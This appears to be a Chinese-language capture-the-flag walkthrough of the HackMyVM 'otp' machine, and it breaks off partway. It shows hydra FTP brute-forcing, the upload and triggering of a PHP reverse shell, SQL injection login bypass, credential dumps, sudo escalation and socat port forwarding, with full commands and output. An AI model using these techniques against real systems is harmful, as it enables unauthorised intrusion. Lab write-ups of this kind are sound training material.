192.168.0.107 argon.otp.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6e90\u4ee3\u7801\u6cc4\u9732<\/h3>\n
\u627e\u5230\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u7248\u672c\uff1a<\/p>\n
view-source:http:\/\/argon.otp.hmv\/login.php<\/code><\/pre>\n<\/div><\/p>\n\u627e\u5230token:<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u754c\u9762\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u5f97\u5230\u4e00\u7ec4\u7528\u6237\uff1a<\/p>\n
otpuser\n#4ck!ng!s!nMybl0od<\/code><\/pre>\n\u767b\u5f55\u4e0a\u53bb\uff1a<\/p>\n
<\/div><\/p>\n\u53ea\u6709\u8fd9\u53e5\u8bdd\uff0c\u6e90\u4ee3\u7801\u4e5f\u6ca1\u4e1c\u897f\u3002<\/p>\n
\u7206\u7834ftp<\/h3>\n
ftp\u5c1d\u8bd5\u9ed8\u8ba4\u767b\u5f55\u65b9\u5f0f\u65e0\u6cd5\u8fdb\u884c\u767b\u5f55\uff0c\u5c1d\u8bd5\u8fd9\u4e2a\u7528\u6237\u540d\u8fdb\u884c\u7206\u7834\uff0c\u540c\u65f6\u5c1d\u8bd5\u4e86\u4e0a\u9762\u90a3\u4e2a\u8d26\u53f7\u5bc6\u7801\u65e0\u6cd5\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 03:42:52\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[STATUS] 258.00 tries\/min, 258 tries in 00:01h, 14344141 to do in 926:38h, 16 active\n[STATUS] 259.67 tries\/min, 779 tries in 00:03h, 14343620 to do in 920:39h, 16 active\n[STATUS] 268.86 tries\/min, 1882 tries in 00:07h, 14342517 to do in 889:07h, 16 active\n^C^C^Z\nzsh: suspended hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2> \/dev\/null<\/code><\/pre>\n\u6ca1\u7206\u7834\u51fa\u6765\uff0c\u5c1d\u8bd5\uff0c\u8fdb\u884c\u793e\u5de5\u5b57\u5178\u7206\u7834\uff1ahttps:\/\/www.ddosi.org\/pass8\/<\/a><\/p>\n\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P pass ftp:\/\/$IP 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 04:18:03\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14650 login tries (l:1\/p:14650), ~916 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[21][ftp] host: 192.168.0.107 login: david password: DAVID\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-07-12 04:18:17<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.0.107.\n220 (vsFTPd 3.0.3)\nName (192.168.0.107:kali): david\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||60936|)\n150 Here comes the directory listing.\ndrwxr-xrwx 2 0 115 4096 Nov 22 2021 .\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 ..\n-rw-r--r-- 1 1001 1001 125 Nov 19 2021 important_note.txt\n226 Directory send OK.\nftp> get important_note.txt\nlocal: important_note.txt remote: important_note.txt\n229 Entering Extended Passive Mode (|||64865|)\n150 Opening BINARY mode data connection for important_note.txt (125 bytes).\n100% |***************************************************************************************************************************************| 125 6.29 KiB\/s 00:00 ETA\n226 Transfer complete.\n125 bytes received in 00:00 (5.57 KiB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||57148|)\n150 Here comes the directory listing.\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 .\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 ..\ndrwxr-xrwx 2 0 115 4096 Nov 22 2021 ftp\n226 Directory send OK.\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||18938|)\n150 Here comes the directory listing.\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 .\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 0 0 7 Nov 17 2021 bin -> usr\/bin\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 boot\ndrwxr-xr-x 17 0 0 3140 Jul 12 03:03 dev\ndrwxr-xr-x 74 0 0 4096 Jul 12 03:03 etc\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 home\nlrwxrwxrwx 1 0 0 30 Nov 17 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 30 Nov 17 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 7 Nov 17 2021 lib -> usr\/lib\nlrwxrwxrwx 1 0 0 9 Nov 17 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 0 0 9 Nov 17 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 0 0 10 Nov 17 2021 libx32 -> usr\/libx32\ndrwx------ 2 0 0 16384 Nov 17 2021 lost+found\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 media\ndrwxr-xr-x 2 0 0 4096 Nov 17 2021 mnt\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 opt\ndr-xr-xr-x 167 0 0 0 Jul 12 03:03 proc\ndrwx------ 2 0 0 4096 Nov 23 2021 root\ndrwxr-xr-x 20 0 0 540 Jul 12 03:03 run\nlrwxrwxrwx 1 0 0 8 Nov 17 2021 sbin -> usr\/sbin\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 srv\ndr-xr-xr-x 13 0 0 0 Jul 12 03:03 sys\ndrwxrwxrwt 10 0 0 4096 Jul 12 04:09 tmp\ndrwxr-xr-x 14 0 0 4096 Nov 17 2021 usr\ndrwxr-xr-x 12 0 0 4096 Nov 17 2021 var\nlrwxrwxrwx 1 0 0 27 Nov 17 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 27 Nov 17 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n226 Directory send OK.\nftp> cd \/var\/www\/html\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||27952|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 ..\n-rw-r--r-- 1 0 0 114 Nov 21 2021 .htaccess\n-rw-r--r-- 1 0 0 11202 Nov 19 2021 index.html\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||20123|)\n553 Could not create file.\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38300|)\n150 Here comes the directory listing.\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 .\ndrwxr-xr-x 12 0 0 4096 Nov 17 2021 ..\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 html\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 otp\n226 Directory send OK.\nftp> cd otp\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38040|)\n150 Here comes the directory listing.\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 ..\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 argon\ndrwxr-x--x 2 0 0 4096 Nov 23 2021 totp\n226 Directory send OK.\nftp> cd argon\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38922|)\n150 Here comes the directory listing.\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 ..\n-rw-r--r-- 1 0 0 10 Feb 05 2020 .gitignore\n-rw-r--r-- 1 0 0 404 Feb 05 2020 CHANGELOG.md\n-rw-r--r-- 1 0 0 384 Feb 05 2020 ISSUE_TEMPLATE.md\n-rw-r--r-- 1 0 0 1101 Feb 05 2020 LICENSE.md\n-rw-r--r-- 1 0 0 12363 Feb 05 2020 README.md\ndrwxr-xr-x 8 0 0 4096 Feb 05 2020 assets\n-rw-r--r-- 1 0 0 221 Nov 22 2021 cr3d5_123.html\ndrwxr-xr-x 2 0 0 4096 Feb 05 2020 docs\n-rw-r--r-- 1 0 0 856 Feb 05 2020 gulpfile.js\n-rw-r--r-- 1 0 0 25537 Nov 22 2021 index.html\n-rw-r--r-- 1 0 0 7554 Nov 22 2021 login.php\n-rw-r--r-- 1 0 0 1280 Feb 05 2020 package.json\n-rw-r--r-- 1 0 0 19070 Nov 22 2021 profile.html\n-rw-r--r-- 1 0 0 50995 Nov 22 2021 tables.html\ndrwxrwxrwx 2 0 1001 4096 Nov 23 2021 u9l04d_\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||60528|)\n553 Could not create file.\nftp> cd u9l04d_\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||42817|)\n150 Here comes the directory listing.\ndrwxrwxrwx 2 0 1001 4096 Nov 23 2021 .\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 ..\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||8011|)\n150 Ok to send data.\n100% |***************************************************************************************************************************************| 3911 14.07 MiB\/s 00:00 ETA\n226 Transfer complete.\n3911 bytes sent in 00:00 (723.63 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u4e0a\u4f20\u4e86\u4e00\u4e2a\u53cd\u5f39shell\uff01\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n
curl http:\/\/argon.otp.hmv\/u9l04d_\/revshell.php<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n(remote) www-data@otp:\/$ sudo -l\nMatching Defaults entries for www-data on otp:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on otp:\n (!avijneyam) NOPASSWD: \/bin\/bash\n(remote) www-data@otp:\/$ sudo -u !avijneyam \/bin\/bash\nbash: !avijneyam: event not found\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep "\/bin\/??sh"\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep "\/bin\/bash"\nroot:x:0:0:root:\/root:\/bin\/bash\navijneyam:x:1000:1000:Avijneyam,,,:\/home\/avijneyam:\/bin\/bash\ndavid:x:1001:1001::\/srv\/ftp:\/bin\/bash\n(remote) www-data@otp:\/$ sudo -u root \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u david \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u avijneyam \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required<\/code><\/pre>\n\u53d1\u73b0\u4e0d\u662f\u6211\u60f3\u7684\u90a3\u6837\uff0c\u6240\u6709\u7684\u90fd\u767b\u4e0d\u4e0a\u53bb\uff0c\u518d\u7ffb\u7ffb\uff1a<\/p>\n
(remote) www-data@otp:\/$ cd ~\n(remote) www-data@otp:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 22 2021 .\ndrwxr-xr-x 12 root root 4096 Nov 17 2021 ..\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 html\ndrwxr-xr-x 4 root root 4096 Nov 19 2021 otp\n(remote) www-data@otp:\/var\/www$ cd otp\n(remote) www-data@otp:\/var\/www\/otp$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 19 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 22 2021 ..\ndrwxr-xr-x 5 root root 4096 Nov 23 2021 argon\ndrwxr-x--x 2 root root 4096 Nov 23 2021 totp\n(remote) www-data@otp:\/var\/www\/otp$ cd totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/hosts\n127.0.0.1 localhost\n127.0.1.1 otp\n127.0.0.1 otp.hmv\n\n# The following lines are desirable for IPv6 capable hosts\n::1 localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n(remote) www-data@otp:\/var\/www\/otp\/totp$ grep -ra "totp" \/etc\/apache2\n\/etc\/apache2\/sites-available\/totp.conf: ServerName totp.otp.hmv\n\/etc\/apache2\/sites-available\/totp.conf: DocumentRoot \/var\/www\/otp\/totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/apache2\/sites-available\/totp.conf \n<VirtualHost *:80>\n # The ServerName directive sets the request scheme, hostname and port that\n # the server uses to identify itself. This is used when creating\n # redirection URLs. In the context of virtual hosts, the ServerName\n # specifies what hostname must appear in the request's Host: header to\n # match this virtual host. For the default virtual host (this file) this\n # value is not decisive as it is used as a last resort host regardless.\n # However, you must set it for any further virtual host explicitly.\n ServerName totp.otp.hmv\n\n #ServerAdmin webmaster@localhost\n DocumentRoot \/var\/www\/otp\/totp\n ErrorLog ${APACHE_LOG_DIR}\/error.log\n CustomLog ${APACHE_LOG_DIR}\/access.log combined\n\n # For most configuration files from conf-available\/, which are\n # enabled or disabled at a global level, it is possible to\n # include a line for only one particular virtual host. For example the\n # following line enables the CGI configuration for this host only\n # after it has been globally disabled with "a2disconf".\n #Include conf-available\/serve-cgi-bin.conf\n<\/VirtualHost>\n\n# vim: syntax=apache ts=4 sw=4 sts=4 sr noet<\/code><\/pre>\n\u6539hosts\u518d\u6b21\u8bbf\u95ee<\/h3>\n192.168.0.107 totp.otp.hmv<\/code><\/pre>\n\u518d\u6b21\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff1a1' or '1' = '1<\/code>\uff0c\u53d1\u73b0\u8fdb\u6765\u4e86\uff01<\/p>\n<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u6ce8\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
avijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\n\nAdroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\nSysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e2a\u7591\u4f3c\u5bc6\u7801\u4ee5\u53ca\u5b57\u5178\uff0c\u8fd9\u4e2a\u9875\u9762\u5c31\u6ca1\u5176\u4ed6\u4e1c\u897f\u4e86\uff0c\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n
(remote) www-data@otp:\/home$ cd \/srv\/ftp\n(remote) www-data@otp:\/srv\/ftp$ ls -la\ntotal 12\ndrwxr-xrwx 2 root ftp 4096 Nov 22 2021 .\ndrwxr-xr-x 3 root root 4096 Nov 19 2021 ..\n-rw-r--r-- 1 david david 125 Nov 19 2021 important_note.txt\n(remote) www-data@otp:\/srv\/ftp$ cat important_note.txt \n"Many times, the idea we come up with is not to fit for the current times but if launched at the right time can do wonders."\n(remote) www-data@otp:\/srv\/ftp$ cd \/\n(remote) www-data@otp:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 root root 7 Nov 17 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 boot\ndrwxr-xr-x 17 root root 3140 Jul 12 03:03 dev\ndrwxr-xr-x 74 root root 4096 Jul 12 03:03 etc\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 home\nlrwxrwxrwx 1 root root 30 Nov 17 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 30 Nov 17 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 7 Nov 17 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 17 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 17 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 17 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 17 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 media\ndrwxr-xr-x 2 root root 4096 Nov 17 2021 mnt\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 opt\ndr-xr-xr-x 155 root root 0 Jul 12 03:03 proc\ndrwx------ 2 root root 4096 Nov 23 2021 root\ndrwxr-xr-x 20 root root 540 Jul 12 03:03 run\nlrwxrwxrwx 1 root root 8 Nov 17 2021 sbin -> usr\/sbin\ndrwxr-xr-x 3 root root 4096 Nov 19 2021 srv\ndr-xr-xr-x 13 root root 0 Jul 12 03:03 sys\ndrwxrwxrwt 2 root root 4096 Jul 12 03:03 tmp\ndrwxr-xr-x 14 root root 4096 Nov 17 2021 usr\ndrwxr-xr-x 12 root root 4096 Nov 17 2021 var\nlrwxrwxrwx 1 root root 27 Nov 17 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 27 Nov 17 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n(remote) www-data@otp:\/$ cd opt\n(remote) www-data@otp:\/opt$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\n-r-------- 1 www-data www-data 2022 Nov 22 2021 creds.sql\n-r-------- 1 www-data www-data 36 Nov 23 2021 note4david.txt\n(remote) www-data@otp:\/opt$ cat note4david.txt \nYour work has done you can rest now\n(remote) www-data@otp:\/opt$ cat creds.sql \n-- MariaDB dump 10.19 Distrib 10.5.12-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost Database: otp\n-- ------------------------------------------------------\n-- Server version 10.5.12-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE='+00:00' *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `creds`\n--\n\nDROP TABLE IF EXISTS `creds`;\n\/*!40101 SET @saved_cs_client = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `creds` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `username` varchar(255) NOT NULL,\n `password` varchar(255) NOT NULL,\n `totp` varchar(255) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `creds`\n--\n\nLOCK TABLES `creds` WRITE;\n\/*!40000 ALTER TABLE `creds` DISABLE KEYS *\/;\nINSERT INTO `creds` VALUES (1,'','','NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK');\n\/*!40000 ALTER TABLE `creds` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n-- Dump completed on 2021-11-20 10:46:17<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u52a0\u5bc6\u4ee5\u540e\u7684\u5bc6\u94a5\uff0c\u5c1d\u8bd5\u4f7f\u7528cyberchef<\/code>\u8fdb\u884c\u89e3\u5bc6<\/p>\n<\/div><\/p>\nNYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK\nn3v3rG0nn4G!v3y0UuP<\/code><\/pre>\n\u548c\u524d\u9762\u7684\u5bc6\u7801\u8054\u60f3\u7ec4\u5408\u4e00\u4e0b\uff1a<\/p>\n
n3v3rG0nn4G!v3y0UuP\navijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\navijneyam:n3v3rG0nn4G!v3y0UuP___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)<\/code><\/pre>\n\u521a\u597d\u6ee1\u8db3\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u7aef\u53e3\u8f6c\u53d1<\/h3>\navijneyam@otp:~$ sudo -l\n[sudo] password for avijneyam: \nMatching Defaults entries for avijneyam on otp:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser avijneyam may run the following commands on otp:\n (root) PASSWD: \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ ls -la\ntotal 20\ndrwx------ 2 avijneyam avijneyam 4096 Nov 22 2021 .\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 22 2021 .bash_history -> \/dev\/null\n-rwx------ 1 avijneyam avijneyam 3526 Nov 17 2021 .bashrc\n-rw------- 1 avijneyam avijneyam 33 Nov 22 2021 flag_user.txt\n-rwx------ 1 avijneyam avijneyam 807 Nov 17 2021 .profile\navijneyam@otp:~$ cat flag_user.txt \n2990aa5108d5803f3fdca99c277ba352\navijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n WARNING: This is a development server. Do not use it in a production deployment.\n Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)<\/code><\/pre>\n\u5f00\u542f\u4e86\u4e00\u4e2a\u7aef\u53e3\u670d\u52a1\uff0c\u4f46\u662f\u7531\u4e8e\u8fd9\u662f\u53d1\u751f\u5728\u672c\u5730\uff0c\u6240\u4ee5kali\u8bbf\u95ee\u4e0d\u5230\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff0c\u5229\u7528\u524d\u51e0\u5929\u5728pwn.college<\/code>\u5b66\u5230\u7684\uff0cctrl+z<\/code>\u5207\u6362\u5230\u540e\u53f0\uff0c\u8fdb\u884c\u8f6c\u53d1\uff0c\u518d\u6062\u590d\u8fdb\u7a0b\uff1a<\/p>\navijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n WARNING: This is a development server. Do not use it in a production deployment.\n Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)\n^Z\n[1]+ Stopped sudo -u root \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ socat tcp-listen:1234,fork tcp:127.0.0.1:5000 &\n[2] 2553724\navijneyam@otp:~$ fg\nsudo -u root \/bin\/bash \/root\/localhost.sh<\/code><\/pre>\n\u4e0a\u4f20\u6d4b\u8bd5<\/h3>\n
\u73b0\u5728\u770b\u4e00\u4e0b\u80fd\u5426\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u6d4b\u8bd5\u4e00\u4e0b\u5e38\u89c4\u7684\u4e0a\u4f20\u65b9\u6cd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X POST http:\/\/$IP:1234\/ \n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>405 Method Not Allowed<\/title>\n<h1>Method Not Allowed<\/h1>\n<p>The method is not allowed for the requested URL.<\/p>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X PUT http:\/\/$IP:1234\/\n{"message":"Provide command in JSON request!","success":false}<\/code><\/pre>\n\u53d1\u73b0\u91c7\u7528put<\/code>\u4e0a\u4f20json<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:1234 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/SourceCode (Status: 